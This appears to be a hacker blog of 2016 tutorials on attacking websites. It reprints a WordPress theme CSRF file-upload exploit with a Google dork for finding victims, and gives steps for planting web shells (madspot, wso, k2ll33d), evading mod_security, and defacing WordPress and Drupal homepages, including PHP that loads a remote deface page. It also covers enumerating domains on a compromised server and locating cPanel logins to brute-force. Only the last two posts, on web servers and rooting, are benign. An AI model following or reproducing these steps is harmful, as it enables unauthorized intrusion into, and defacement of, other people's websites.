Facebook massage

Tuesday, December 27, 2016

Deface Wordpress site's index when you can't plant shell

Deface Wordpress site's index when you can't plant shell
Before proceeding : Must have permissions to edit wordpress theme files. There can be several ways(executing php codes and doing blah blah blah), I am mentioning very easy one that worked fine for me or can be confirmed as 'tested'. okay, let's get onto the action ... go to localhost/installed-wp-directory/wp-admin/theme-editor.php (admin panel access required!) now, click on 'header.php' of active theme(note that,'active theme') of the site.replace all codes with 'file uploader form(php scripted, available in google)' navigate to localhost/installed-wp-directory/index.php you will see 'file uploader' on top of homepage!now select your deface page(ex. index.php) and upload.when finished, reload the page :D pwned :p or localhost/wp-installed-directory/deface-page.php done ... Greets to : Allah for giving me a brain.Alhamdulillah. end of tutorial ..

How to use Remote File Upload Exploit with php script

How to use Remote File Upload Exploit with php script

Now, I will be guiding you all about using a type of exploit most often found in exploit database sites. Look at the below exploit as an example : ------------------------------------------- ?#?Title? : Wordpress Dimension Themes CSRF File Upload Vulnerability ?#?Author? : DevilScreaM ?#?Date? : 11/17/2013 - 17 November 2013 ?#?Category? : Web Applications ?#?Type? : PHP ?#?Vendor? : http://themeforest.net ?#?Download? : http://themeforest.net/item/dimension-retina-responsive-multipurpose-theme/ ?#?Greetz? : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber ?#?Thanks? : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | ?#?Tested? : Mozila, Chrome, Opera -> Windows & Linux ?#?Vulnerabillity? : CSRF ?#?Dork? : inurl:wp-content/themes/dimension CSRF File Upload Vulnerability Exploit & POC : http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php Script : <form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> File Access : http://site-target/uploads/[years]/[month]/your_shell.php Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php ------------------------------------------- This is a wordpress exploit titled "Wordpress Dimension Themes CSRF File Upload Vulnerability" to use this exploit, you will be required of a ftp server.or, install AppServ in your pc, which will allow you to execute php scripts in your browser. STEP 1 : Download AppServ from internet STEP 2 : Open notepad and paste "Script"(check in top.there are some php codes) and save file as "exploit.php" in public_html directory and paste any shells like madspot,wso,k2ll33d shells STEP 3 : Search the given dork in google and select any site(note : if you can't find shell in shell location, you have to try another) STEP 4 : Open the php file in notepad and find http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php and replace the 127.0.0.1 with the site url you got STEP 5 : Now save the php file and open in browser(make sure you have have AppServ successfully running) STEP 6 : Select your shell and upload.Once after successful upload, you have to visit http://127.0.0.1/uploads/[years]/[month]/your_shell.php (http://127.0.0.1/wp-content/uploads/2016/01/madspot.php) STEP 7 : If the site is vulnerable, your shell should be planted successfully.If there is no shell, try other sites. N.B : All exploits of this type can be used using this way...Some exploits attempts to upload shell.php automatically(ex. wordpress rightnow theme vulnerability). ./The_End

How to use Remote File Upload Exploit with php script [Mobile Friendly Edition]

How to use Remote File Upload Exploit with php script [Mobile Friendly Edition]

How to use https://mobile.facebook.com/notes/choyon-ahmed/how-to-use-remote-file-upload-exploit-with-php-script/1542511916063089/ exploit in mobile?
Well, let's show some more actions :P You need some advanced level skills for this or you can borrow from someone expert ;) [+] Things required : 1.A shelled site(backdoored) 2.Exploit 3.Your brain! [+] Steps : STEP 1 : Suppose, you have the shell located in http://127.0.0.1/shell.php & Create a file named "exploit.php" using shell(backdoor) panel STEP 2 : use shell to edit and save file instead of notepad.A shelled site itself runs on a computer. ;) STEP 3 : visit http://127.0.0.1/exploit.php and boom :D you have it done ;) oka? STEP 4 : check for the shell and if exists, you got the money in hand ^_^ ./The_End

How to check if your port is open or not

How to check if your port is open or not

You might want to check if you have successfully opened port in your computer or not by going to
http://portchecker.co A short description from the site : Port Checker is a simple and free online tool for checking open ports on your computer/device, often useful in testing port forwarding setup on a machine. For instance, if you're facing connection issue with a program (email, IM client etc) then it may be possible that the port required by the application is getting blocked by firewall or ISP. In such cases, this tool might help you in diagnosing the issue. It's also useful for security reasons, in case you're worried whether a particular port is open or closed. More info on the website...

[TuT] Deface Homepage of Drupal sites when you don't have write permission in home directory

[TuT] Deface Homepage of Drupal sites when you don't have write permission in home directory


Salam guys!
suppose, you got a case like : You logged into a drupal site and when tried all methods, found the site having no permission to upload anything in the main domain root directory.So, you don't have any way to show your own deface page in index of site as you can't upload any file. Let's try another technique that will help you to show your deface page! Follow me : 1.Create a basic page(turn on php filter from modules) with text formatting as 'php code' and include the below codes exactly in body section : <?php die(file_get_contents("http://url to your deface page")); ?> and save it.note the 'node/***' url. 2.Visit 127.0.0.1/admin/config/system/site-information and in front page box, put the 'node/***' url(not the whole link from address bar.only node/*** should be pasted) and save. 3.Logout from site using 127.0.0.1/user/logout visit homepage ;) :* done there! N.B : might not work on some servers.

[TUT] Find out defaced domain names of server after uploading shell and getting into the domains root folder

[TUT] Find out defaced domain names of server after uploading shell and getting into the domains root folder
Salam all, a lot of people has no idea that, once you uploaded your shell in a server and it contains more than one domains under current username of server sometimes. but, for lack of knowledge, they misses them :p now, this tut gonna help you to learn how to find these. here we go ... there can be few ways to find domain names of shelled server. 1 : Reverse IP lookup (https://hackertarget.com/reverse-ip-lookup) 2 : Bing reverse (www.bing.com/search?q=ip:xxx.xxx.xxx.xxx - xxx will be the server ip address) 3 : guessing (if folder name is "example", add .com(top level domain names) after it and open the link ~ example.com) 4 : by reading /etc/named.conf (the best way but, not everytime server gonna show you site as few servers are secured) once you uploaded your index in every folders under /public_html/(noob, i am not going to teach you how to find domains root folder), keep checking the domains found in the lookup.you will get them.mind it, try every systems.you will get all. :)

[TUT] Bypass mod_security when uploading and working with shell

[TUT] Bypass mod_security when uploading and working with shell

madspot security team shell was designed to bypass mod_security system of webserver applications where other bypass shells can't bypass so. although some highly secured servers doesn't allow madspot shell to access files in server, but its upload option still works. we will be using this upload option to get access of the files in server.we will be required of k2ll3d shell here to do so. once we uploaded madspot shell and found "access denied :(" error message, we have to upload k2ll3d shell and open it :D voila!files are infront of you! now enjoy your works, but the upload option of k2ll3d shell will also not going to work out for you due to mod_security.don't worry, use "new file" option to create your deface page :) what done here : bypassed mod_security using madspot bypassed "access denied" using k2ll3d thanks :) enjoy ... ./3xpl0173r~x3d ./Team_CC

[TuT] How to find host provider of target website

et, our target is example.com
we will go to http://whois.domaintools.com then put target url.
in the name server section, we should see ns1.exampleserver.ext where exampleserver.ext is the host provider.if its a shared host provider, we can try symlinking/cpanel bruteforce or if dedicated server then cpanel bruteforce blah blah...
to find out the cpanel using google, we can try
inurl:exampleserver.ext intext:login
inurl:exampleserver.ext intext:username password
or customize by own...
thats it...

Building Up Own Server

eb application) sends shared root directory(public_html or www directory files of web application) to the clients where index.php is the main page of host server.Then the page is shown to the clients browser.also if data storing system is available,the web application also interracts with mySQL database(to store client info for recognising them next time) too.
So,we need these things in our computer for making it a web server :
1.one static IP address that never changes(experts suggest this.because,if your IP changes continuously,requests from clients wont reach to your web application and it wont interract with client)
2.a dedicated computer with faster internet connection that will be kept turned on 24 hour everyday.if you turn it off,server will go offline.
3.An Web Application software for ex. "XAMPP/WAMPP"
4.a domain name
turn on your apache(in XAMPP) server and mySQL server(in XAMPP)[confused?google please!] service and connect your domain with it.
[not understanding?google please for the video tutorial]
now,when your domain is successfully connected with web app,you can see apache default page if visit the domain from browser(from anywhere)
go to your public_html or www directory and put your scripts(the site files or whatever you want to share)[this directory can be found in your apache installation folder(in default C:\apache)]
Thanks for reading :P
N.B : I never took my computer online as server so,no experice of running a worldwide web server.wrote from knowledge.apology for mistakes :3
Google is always open for help :)

What is Web Server & Server Rooting??

that interracts and serves data to the clients.there are many things under it.I am not going to the core...
So,mostly the server provider uses linux based operating system as it has much more security system.likewise i described in previous post that these type operating system has multiple users and groups for files protection.i talked about "root" user.Server is rooted to become the root user of a server and you know what root can do in sever ...
Hacker uses various methods and fools the server and become the root user and when he becomes the root,server is called "rooted".
Search in google,you will get to know more about server rooting and how they are rooted.but,hacker needs to access atleast one user account in a server(this user account is not website user account!its the server user account like i gave example of "user001" in previous post.).
thanks for reading.Queries should be googled! :)
also apology for mistakes and wrong informations..